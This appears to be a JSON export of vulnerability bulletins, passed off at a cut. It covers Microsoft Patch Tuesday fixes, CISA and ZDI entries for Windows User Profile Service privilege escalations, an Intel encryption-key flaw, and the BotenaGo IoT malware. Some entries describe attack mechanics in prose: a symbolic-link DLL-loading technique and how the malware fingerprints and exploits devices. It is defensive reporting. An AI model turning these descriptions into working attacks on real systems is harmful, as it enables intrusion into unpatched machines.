Vulnerabilities 3 Spoofing Vulnerabilities Six zero-day vulnerabilities were addressed in the January\u2019s patch Tuesday: CVE-2021-22947: Remote Code-Execution vulnerability in open-source Curl library. CVE-2021-36976: Remote Code-Execution vulnerability in open-source Libarchive. CVE-2022-21874: Remote Code-Execution vulnerability in Local Windows Security Center API. CVE-2022-21919: Privilege escalation vulnerability in Windows User Profile Service. CVE-2022-21839: Denial-of-Service vulnerability in Windows Event Tracing Discretionary Access Control List. CVE-2022-21836: Spoofing vulnerability in Windows Certificate. Some of the critical vulnerabilities are listed below: CVE-2022-21846: Remote Code-Execution vulnerability in Microsoft exchange server which. CVE-2022-21840: Remote Code-Execution vulnerability in Microsoft Office 365. CVE-2022-21857: Active Directory Domain Services Elevation of Privilege Vulnerability CVE-2022-21898: Privilege escalation vulnerability in DirectX Graphics. CVE-2022-21912: DirectX Graphics Kernel Remote Code Execution Vulnerability. CVE-2022-21907: HTTP Protocol Stack Remote Code-Execution Vulnerability CVE-2022-21917: HEVC Video Extensions Remote Code-Execution Vulnerability. Out of the critical bugs, a Remote Code-Execution (CVE-2022-21907) issue in the HTTP protocol stack (HTTP.sys) used as a protocol listener for processing HTTP requests by the Windows Internet Information Services (IIS) web server. Successful exploitation requires an attacker to send maliciously crafted packets to targeted Windows servers, which use the vulnerable HTTP Protocol Stack for processing packets. Hive Pro threat researchers recommend users to prioritize patching this flaw on all the affected servers since it could allow unauthenticated attackers to remotely execute arbitrary code in low complexity attacks and "in most situations," without requiring user interaction. Vulnerabiliy Details Patch Links https://msrc.microsoft.com/update-guide/ References https://www.bleepingcomputer.com/microsoft-patch-tuesday-reports/Jan-2022.html https://threatpost.com/microsoft-wormable-critical-rce-bug-zero-day/177564/ https://www.bleepingcomputer.com/news/microsoft/microsoft-new-critical-windows-http-vulnerability-is-wormable/ https://www.bleepingcomputer.com/news/microsoft/microsoft-new-critical-windows-http-vulnerability-is-wormable/ https://thehackernews.com/2022/01/first-patch-tuesday-of-2022-brings-fix.html", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-12T07:30:07", "type": "hivepro", "title": "Microsoft Patch Tuesday fixes critical zero-days along with 97 other flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21836", "CVE-2022-21839", "CVE-2022-21840", "CVE-2022-21846", "CVE-2022-21857", "CVE-2022-21874", "CVE-2022-21898", "CVE-2022-21907", "CVE-2022-21912", "CVE-2022-21917", "CVE-2022-21919"], "modified": "2022-01-12T07:30:07", "id": "HIVEPRO:C224B728F67C8D1703A8BF2411600695", "href": "https://www.hivepro.com/microsoft-patch-tuesday-fixes-critical-zero-days-along-with-97-other-flaws/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-21T07:30:07", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&CK TTPs 765 14 1 2 6 25 The third week of April 2022 witnessed a huge spike on the discovery of 765 vulnerabilities out of which 14 gained the attention of Threat Actors and security researchers worldwide. Among these 14, there were 5 zero-day, 9 of them are undergoing analysis and 2 other vulnerabilities about which the National vulnerability Database (NVD) is awaiting analysis while 1 was not present in the NVD at all. Hive Pro Threat Research Team has curated a list of 14 CVEs that require immediate action. Further, we also observed a Threat Actor groups being highly active in the last week. OldGremlin, a Russian threat actor group popular for financial crime and gain, was observed targeting Russian agencies Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section. Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2022-24521* CVE-2022-26904* https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26904 CVE-2022-1364* https://www.google.com/intl/en/chrome/?standalone=1 CVE-2022-22954* CVE-2022-22955 CVE-2022-22956 CVE-2022-22957 CVE-2022-22958 CVE-2022-22959 CVE-2022-22960* CVE-2022-22961 https://kb.vmware.com/s/article/88099 CVE-2018-6882 https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.7 CVE-2022-25165 CVE-2022-25166 https://aws.amazon.com/vpn/client-vpn-download/ *zero-day vulnerability Active Actors: Icon Name Origin Motive OldGremlin Russia Financial crime and gain Targeted Location: Targeted Sectors: Common TTPs: TA0043: Reconnaissance TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0011: Command and Control T1592: Gather Victim Host Information T1583: Acquire Infrastructure T1190: Exploit Public-Facing Application T1059: Command and Scripting Interpreter T1548: Abuse Elevation Control Mechanism T1548: Abuse Elevation Control Mechanism T1555: Credentials from Password Stores T1071: Application Layer Protocol T1592.001: Hardware T1583.002: DNS Server T1566: Phishing T1059.007: JavaScript T1068: Exploitation for Privilege Escalation T1027: Obfuscated Files or Information T1555.004: Windows Credential Manager T1071.004: DNS T1592.002: Software T1583.001: Domains T1566.001: Spearphishing Attachment T1059.003: Windows Command Shell T1071.001: Web Protocols T1590: Gather Victim Network Information T1587: Develop Capabilities T1566.002: Spearphishing Link T1204: User Execution T1132: Data Encoding T1590.005: IP Addresses T1587.001: Malware T1204.002: Malicious File T1132.001: Standard Encoding T1585: Establish Accounts T1204.001: Malicious Link T1568: Dynamic Resolution T1585.002: Email Accounts T1568.002: Domain Generation Algorithms T1588: Obtain Capabilities T1573: Encrypted Channel T1588.006: Vulnerabilities T1573.001: Symmetric Cryptography T1572: Protocol Tunneling Threat Advisories: Two actively exploited vulnerabilities affect multiple VMware products Google Chrome issues an emergency update to address the third zero-day of year 2022 Microsoft Patch Tuesday April 2022 addressed two zero-day vulnerabilities Old Zimbra vulnerability used to target Ukrainian Government Organizations Two Vulnerabilities discovered in AWS Client VPN OldGremlin, a threat actor targeting Russian organizations with phishing emails since 2020", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-21T04:59:07", "type": "hivepro", "title": "Weekly Threat Digest: 11 \u2013 17 April 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-6882", "CVE-2022-1364", "CVE-2022-22954", "CVE-2022-22955", "CVE-2022-22956", "CVE-2022-22957", "CVE-2022-22958", "CVE-2022-22959", "CVE-2022-22960", "CVE-2022-22961", "CVE-2022-24521", "CVE-2022-25165", "CVE-2022-25166", "CVE-2022-26904"], "modified": "2022-04-21T04:59:07", "id": "HIVEPRO:F95B9B5A24C6987E85478A62BD37DD7D", "href": "https://www.hivepro.com/weekly-threat-digest-11-17-april-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2023-05-27T16:20:26", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the User Profile Service. By creating a directory junction, an attacker can abuse the service to delete a file. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-13T00:00:00", "type": "zdi", "title": "Microsoft Windows User Profile Service Directory Junction Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21895"], "modified": "2022-01-13T00:00:00", "id": "ZDI-22-050", "href": "https://www.zerodayinitiative.com/advisories/ZDI-22-050/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T15:49:08", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the User Profile Service. By creating a directory junction, an attacker can abuse the service to delete a directory. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T00:00:00", "type": "zdi", "title": "Microsoft Windows User Profile Service Directory Junction Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2021-08-11T00:00:00", "id": "ZDI-21-966", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-966/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-05-27T15:17:54", "description": "Microsoft Windows User Profile Service contains an unspecified vulnerability that allows for privilege escalation.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-25T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows User Profile Service Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26904"], "modified": "2022-04-25T00:00:00", "id": "CISA-KEV-CVE-2022-26904", "href": "", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Microsoft Windows User Profile Service contains an unspecified vulnerability that allows for privilege escalation.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-25T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows User Profile Service Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21919"], "modified": "2022-04-25T00:00:00", "id": "CISA-KEV-CVE-2022-21919", "href": "", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:17:33", "description": "Microsoft Windows User Profile Service contains an unspecified vulnerability which allows for privilege escalation.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows User Profile Service Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484"], "modified": "2022-03-31T00:00:00", "id": "CISA-KEV-CVE-2021-34484", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:29:40", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.0, "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows User Profile Service Elevation of Privilege (CVE-2022-21919)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21919"], "modified": "2022-01-11T00:00:00", "id": "CPAI-2022-0003", "href": "", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-11-15T21:22:00", "description": "A security vulnerability in Intel chips opens the door for encrypted file access and espionage, plus the ability to bypass copyright protection for digital content.\n\nThat\u2019s according to Positive Technologies (PT), which found that the vulnerability (CVE-2021-0146) is a debugging functionality with excessive privileges, which is not protected as it should be.\n\nThe high-severity privilege-escalation issue is rated 7.1 out of 10 on the CVSS vulnerability-severity scale.\n\n[](<https://threatpost.com/webinars/multi-cloud-security-and-visibility-an-intro-to-osquery-and-cloudquery/?utm_source=uptycs&utm_medium=email&utm_campaign=event&utm_id=uptycs&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\n\u201c[The] hardware allows activation of test or debug logic at runtime for some Intel processors which may allow an unauthenticated user to potentially enable escalation of privilege via physical access,\u201d according to Intel\u2019s advisory, [issued last week](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00528.html>).\n\nIn terms of scope, the vulnerability affects the Pentium, Celeron and Atom processors of the Apollo Lake, Gemini Lake and Gemini Lake Refresh platforms. These chips power laptops, mobile devices, embedded systems, medical devices and a variety of internet of things (IoT) offerings.\n\n\u201cAccording to a study by Mordor Intelligence, Intel ranks fourth in the IoT chip market, while its Intel Atom E3900 series IoT processors, which also contain the CVE-2021-0146 vulnerability, are used by car manufacturers in more than 30 models, including, according to unofficial sources, in Tesla\u2019s Model 3,\u201d PT noted in a writeup shared with Threatpost.\n\nTo address the issue, users should install the [UEFI BIOS](<https://threatpost.com/intel-security-holes-cpus-bluetooth-security/166747/>) updates published by manufacturers of each piece of electronic equipment. The following processor models are affected:\n\n\n\nSource: Intel.\n\n## **CVE-2021-0146 Impact for End Users**\n\nWhen it comes to impact, an exploit would allow cybercriminals to extract a device\u2019s encryption key and gain access to information.\n\n\u201cOne example of a real threat is lost or stolen laptops that contain confidential information in encrypted form,\u201d said Mark Ermolov, a PT researcher who was credited with discovering the bug (along with PT\u2019s Dmitry Sklyarov and independent researcher Maxim Goryachy).\n\nThe vulnerability is also dangerous because it facilitates the extraction of the root encryption key used in Intel\u2019s Platform Trust Technology and Enhanced Privacy ID technologies, which are used to protect digital content from illegal copying, Ermolov added\n\n\u201cFor example, a number of Amazon e-book models use Intel EPID-based protection for digital rights management,\u201d he explained. \u201cUsing this vulnerability, an intruder might extract the root EPID key from a device (e-book), and then, having compromised Intel EPID technology, download electronic materials from providers in file form, copy and distribute them.\u201d\n\nAdditionally, an exploit could allow cyberattackers to conduct targeted attacks across the supply chain, Ermolov noted.\n\n\u201cFor example, an employee of an Intel processor-based device supplier could extract the Intel CSME firmware key and deploy spyware that security software would not detect,\u201d he said.\n\n**_Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, _**[**_\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d_**](<https://bit.ly/3bBMX30>) **_on Wed., Nov. 17 at 2 p.m. ET. Sponsored by Specops._**\n\n[**_Register NOW_**](<https://bit.ly/3bBMX30>)_** for the LIVE event!**_\n", "cvss3": {}, "published": "2021-11-15T20:52:27", "type": "threatpost", "title": "High-Severity Intel Processor Bug Exposes Encryption Keys", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-0146", "CVE-2021-34484"], "modified": "2021-11-15T20:52:27", "id": "THREATPOST:53A062956C31459E2846CD4C959DFD49", "href": "https://threatpost.com/intel-processor-bug-encryption-keys/176355/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-15T21:22:03", "description": "A partially unpatched security bug in Windows that could allow local privilege escalation from a regular user to System remains unaddressed fully by Microsoft \u2013 but an unofficial micropatch from oPatch has hit the scene.\n\nThe bug ([CVE-2021-34484](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484>)) was originally disclosed and patched as part of Microsoft\u2019s [August Patch Tuesday updates](<https://threatpost.com/exploited-windows-zero-day-patch/168539/>). At the time, it was categorized as an arbitrary directory-deletion issue that was considered low-priority because an attacker would need to locally log into the targeted computer to exploit it, which, in theory, would allow the adversary to delete file folders anyway.\n\nHowever, the security researcher who discovered it, Abdelhamid Naceri, [soon uncovered](<https://halove23.blogspot.com/2021/10/windows-user-profile-service-0day.html>) that it could also be used for privilege escalation, which is a whole other ball of wax. System-level users have access to resources, databases and servers on other parts of the network.\n\nAbdelhamid also took a look at Microsoft\u2019s original patch, subsequently finding a bypass for it via a simple tweak to the exploit code he had developed, essentially reverting it to zero-day status.\n\n> CVE-2021-34484 bypass as 0day<https://t.co/W0gnYHxJ6B>\n> \n> \u2014 Abdelhamid Naceri (@KLINIX5) [October 22, 2021](<https://twitter.com/KLINIX5/status/1451558296872173577?ref_src=twsrc%5Etfw>)\n\n\u201cThe vulnerability lies in the User Profile Service, specifically in the code responsible for creating a temporary user profile folder in case the user\u2019s original profile folder is damaged or locked for some reason,\u201d explained 0Patch\u2019s Mitja Kolsek in a [Thursday writeup](<https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html>) . \u201cAbdelhamid found that the process (executed as Local System) of copying folders and files from user\u2019s original profile folder to the temporary one can be attacked with symbolic links to create attacker-writable folders in a system location from which a subsequently launched system process would load and execute attacker\u2019s DLL.\u201d\n\n[](<https://threatpost.com/webinars/multi-cloud-security-and-visibility-an-intro-to-osquery-and-cloudquery/?utm_source=uptycs&utm_medium=email&utm_campaign=event&utm_id=uptycs&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\nThe exploit is straightforward: An attacker would create a specially crafted symbolic link (essentially, a shortcut link that points to a specific file or folder), then would need to save it in the temporary user profile folder (C:\\Users\\TEMP).\n\nThen, when the User Profile Service copies a folder from user\u2019s original profile folder as described by Kolsek, the symbolic link will force it to create a folder containing a malicious library (DLL) payload somewhere else where the attacker would normally not have permissions to create one.\n\n\u201cMicrosoft, even though believing the vulnerability only allowed for deletion of an arbitrarily \u2018symlinked\u2019 folder, made a conceptually correct fix: it checked whether the destination folder under C:\\Users\\TEMP was a symbolic link, and aborted the operation if so,\u201d explained Kolsek. \u201cThe incompleteness of this fix, as noticed by Abdelhamid, was in the fact that the symbolic link need not be in the upper-most folder (which Microsoft\u2019s fix checked), but in any folder along the destination path.\u201d\n\nThe micropatch fixes this by extending the security check for symbolic links to the entire destination path by calling the \u201cGetFinalPathNameByHandle\u201d function.\n\nIt should be noted that a workable exploit also requires attackers to be able to win a race condition (with unlimited attempts) since the system will be attempting to perform two operations (one malicious, one legitimate) at the same time. Also, even though Abdelhamid said that \u201cit might be possible to [exploit] without knowing someone [else\u2019s] password,\u201d so far, having user credentials for the targeted computer remains an obstacle, Kolsek noted.\n\nThe bug affects Windows 10 (both 32 and 64 bit), versions v21H1, v20H2, v2004 and v1909; and Windows Server 2019 64 bit.\n\nMicrosoft hasn\u2019t released a timeline for updating its official patch and didn\u2019t immediately respond to a request for comment.\n\n**_Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, _**[**_\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d_**](<https://bit.ly/3bBMX30>) **_on Wed., Nov. 17 at 2 p.m. ET. Sponsored by Specops._**\n\n[**_Register NOW_**](<https://bit.ly/3bBMX30>)_** for the LIVE event!**_\n", "cvss3": {}, "published": "2021-11-12T19:49:05", "type": "threatpost", "title": "Windows 10 Privilege-Escalation Zero-Day Gets Unofficial Fix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-0146", "CVE-2021-34484"], "modified": "2021-11-12T19:49:05", "id": "THREATPOST:84909E392F4171398A52202CCC4E215A", "href": "https://threatpost.com/windows-10-privilege-escalation-zero-day-unofficial-fix/176313/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-15T21:22:33", "description": "Newly surfaced malware that is difficult to detect and written in Google\u2019s open-source programming language has the potential to [exploit millions](<https://threatpost.com/bug-iot-millions-devices-attackers-eavesdrop/168729/>) of routers and [IoT devices](<https://threatpost.com/iot-attacks-doubling/169224/>), researchers have found.\n\nDiscovered by researchers at AT&T AlienLabs, BotenaGo can exploit more than 30 different vulnerabilities to attack a target, Ofer Caspi, a security researcher at Alien Labs, wrote in a [blog post](<https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits>) published Thursday.\n\nThe malware, which is written in [Golang](<https://golang.org/>)\u2014a language Google first published in 2007\u2013works by creating a backdoor to the device. It then waits to either receive a target to attack from a remote operator through port 19412 or from another related module running on the same machine, he wrote.\n\n[](<https://threatpost.com/webinars/multi-cloud-security-and-visibility-an-intro-to-osquery-and-cloudquery/?utm_source=uptycs&utm_medium=email&utm_campaign=event&utm_id=uptycs&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\nGolang, also known as Go, is aimed at simplifying how software is built by making it easy for developers to compile the same code for different systems. This feature may be the reason why it\u2019s caught on with malware developers in the last few years, since it also makes it easier for attackers to spread malware on multiple operating systems, Caspi wrote.\n\nIndeed, [research from Intezer](<https://www.intezer.com/blog/malware-analysis/year-of-the-gopher-2020-go-malware-round-up/>), which offers a platform for analyzing malware, suggests that there has been a 2,000 percent increase in malware code written in Go being found in the wild, he wrote.\n\nResearchers said at this time they don\u2019t know which threat actor or actors developed BotenaGo, nor the full scale of devices that are vulnerable to the malware. So far, antivirus protections also don\u2019t seem to recognize the malware, sometimes misidentifying it as a [variant of Mirai malware](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>), Caspi wrote.\n\n## **Setting Up the Attack**\n\nBotenaGo commences its work with some exploratory moves to see if a device is vulnerable to attack, Caspi wrote. It starts by initializing global infection counters that will be printed to the screen, informing the attacker about total successful infections. The malware then looks for the \u2018dlrs\u2019 folder in which to load shell scripts files. If this folder is missing, BotenaGo stops the infection process.\n\nIn its last step before fully engaging, BotenaGo calls the function \u2018scannerInitExploits\u2019, \u201cwhich initiates the malware attack surface by mapping all offensive functions with its relevant string that represent the targeted system,\u201d Caspi wrote.\n\n[](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/?utm_source=Specops+&utm_medium=web&utm_campaign=event&utm_id=Specops+&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\nOnce it establishes that a device is vulnerable to attack, BotenaGo proceeds with exploit delivery by first querying the target with a simple \u201cGET\u201d request. It then searches the returned data from the \u201cGET\u201d request with each system signature that was mapped to attack functions.\n\nResearchers detail several possible attacks that can be carried out using this query. In one, the malware maps the string \u201cServer: Boa/0.93.15\u201d to the function \u201cmain_infectFunctionGponFiber,\u201d which attempts to exploit a vulnerable target, Caspi wrote.\n\nThis allows the attacker to execute an OS command via a specific web request using a vulnerability tracked as [CVE-2020-8958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8958>). A [SHODAN search](<https://www.shodan.io/>) turned up nearly 2 million devices that are vulnerable to this type of attack alone, he wrote.\n\n\u201cIn total, the malware initiates 33 exploit functions that are ready to infect potential victims,\u201d Caspi wrote. A full list of the vulnerabilities that BotenaGo can exploit is included in the post.\n\n## **Backdooring Devices to Execute Commands**\n\nThere are two different ways that the malware can receive commands to target victims, researchers found. One is the create backdoor ports\u201331421 and 19412\u2014that are used in an attack scenario, 